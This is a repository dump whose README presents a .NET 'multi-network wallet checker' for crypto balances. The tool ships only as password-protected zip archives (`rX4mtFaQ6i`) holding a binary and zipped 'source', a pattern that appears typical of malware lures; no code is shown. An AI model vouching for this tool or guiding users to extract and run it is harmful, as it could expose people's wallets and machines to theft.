├── screen.png ├── bin └── Release.zip ├── source └── multi-network-wallet-checker.zip └── README.md /screen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ak1rahunt3r/multi-network-wallet-checker/HEAD/screen.png -------------------------------------------------------------------------------- /bin/Release.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ak1rahunt3r/multi-network-wallet-checker/HEAD/bin/Release.zip -------------------------------------------------------------------------------- /source/multi-network-wallet-checker.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ak1rahunt3r/multi-network-wallet-checker/HEAD/source/multi-network-wallet-checker.zip -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![alt text](https://github.com/ak1rahunt3r/multi-network-wallet-checker/blob/main/screen.png?raw=true) 2 | 3 | ## Installation 4 | 1. Clone/download repository and extract files with pass `rX4mtFaQ6i` to folder 5 | 2. Fill the files with addresses in the `addresses` folder 6 | 4. Install dependencies: .Net Framework 4.5 7 | 6. Launch program 8 | 9 | 10 | ### Web Server 11 | 12 | Launches a local website to view all the statistics described below in the browser. It includes column sorting, highlighting low balances, and more. 13 | 14 | ### Network Checkers: 15 | * ZkSync 16 | * Starknet 17 | * Layerzero 18 | * Zora 19 | * Aptos 20 | * Linea 21 | 22 | It will display the following information in the console and save it in a CSV file: 23 | * Ether/Stablecoin balance 24 | * Number of transactions 25 | * Unique days/weeks/months 26 | * First and last transactions 27 | * Gas spent 28 | * Chain-specific information 29 | 30 | ### Balance Retrieval 31 | 32 | Shows the balance of native tokens/USDT/USDC/DAI in the selected network. Available networks: eth, arbitrum, optimism, polygon, bsc, avalanche. 33 | 34 | ### EVM Checker 35 | 36 | * Number of transactions 37 | * Unique days/weeks/months 38 | * First and last transactions 39 | * Gas spent 40 | 41 | I recommend cloning this script rather than downloading the zip file, as it will be a universal tool for wallet management, and over time, it will include functionality for checking balances on EVM networks. 42 | 43 | To use the EVM Checker, rename .env.example to .env and add your Moralis API Key. 44 | --------------------------------------------------------------------------------